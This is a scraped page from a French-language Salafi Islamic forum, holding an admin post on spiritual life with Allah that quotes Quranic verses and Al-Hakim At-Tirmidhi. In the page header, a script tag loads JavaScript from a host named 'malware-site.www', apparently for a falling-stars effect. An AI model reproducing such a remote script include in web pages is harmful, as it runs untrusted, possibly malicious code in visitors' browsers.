ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Mai 2018

LunMarMerJeuVenSamDim
 123456
78910111213
14151617181920
21222324252627
28293031   

Calendrier Calendrier


    la vie avec Allah عز و جل

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 36
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    la vie avec Allah عز و جل

    Message par assalafia le Mer 5 Nov - 20:18

    Surprised
    Sache-le, ô mon frère, la subsistance de toutes les créatures dépend d’Allah Ta’ala. Quelle sera dès lors ton opinion sur quelqu’un dont Allah Ta’ala prend un soin particulier, qu’Il prend sous Sa protection et qu’Il met parmi les gens qu’Il a en propre, parmi les gens de Son amitié. Celui qui n’est pas mort ne voit la certitude qu’au moment de mourir, le Messager d’Allah l’a dit -‘alayhi salat wa salaam- : « Celui qui est mort, sa certitude s’est accomplie » [1]. Tandis que celui qui est mort, de l’âme de qui l’esprit est sorti et qui est passé, par son esprit, de ce bas-monde vers l’au-delà, voit de ses yeux l’au-delà et ce qui s’y trouve. De même, celui qui est mort -au sens de ce terme- et vit de par son Maître sait qu’il ne possède rien, pour lui-même, ni de nuisible ni d’utile, ni mort, ni vie, ni résurrection. Pour lui a été retiré le couvercle de sa négligence, sa certitude s’est accomplie et il est devenu vivant de par son maître. Il l’a en effet pris sous Sa protection et a pris soin de lui, a appuyé son cœur et l’a vivifié. Il contemple donc, par la lumière du Réel, des choses que les autres n’ont pas contemplées.
    Allah Ta’ala a dit « Ne pense pas que ceux qui ont été tués dans le sentier d’Allah, soient morts. Au contraire, ils sont vivants, auprès de leur Seigneur, bien pourvus ». (Sûrat Al’Imran, v.169) Il a aussi dit : « Et ne dites pas de ceux qui sont tués dans le sentier d’Allah qu’ils sont morts. Au contraire ils sont vivants, mais vous en êtes inconscients. » (Sûrat al-Baqara, v.154)
    Celui que le mécréant tue sur le chemin d’Allah, Allah Ta’ala le rend vivant de par Sa générosité, martyr. Quelle sera donc ton opinion à propos de celui que tuent la lumière de l’amour et le feu de la peur de la séparation, le feu de l’opposition aux caprices, la lumière de la conformité au Réel et le feu du désir, qui tue son âme avec l’épée du tawhîd et devient vivant par (bi-Llâh) Allah, Le Puissant et Majestueux.
    « Bayân al-farq bayna as-sadr wa al-qalb wa al-fu’âd wa al-hubb » d’Al Hakîm At-Tirmidhî.
    [1] Ce hadîth ne se trouve dans aucun des neuf Livres. Voir as-Sahâwî, al-Maqâsid, p.670-671.

      La date/heure actuelle est Dim 27 Mai - 22:23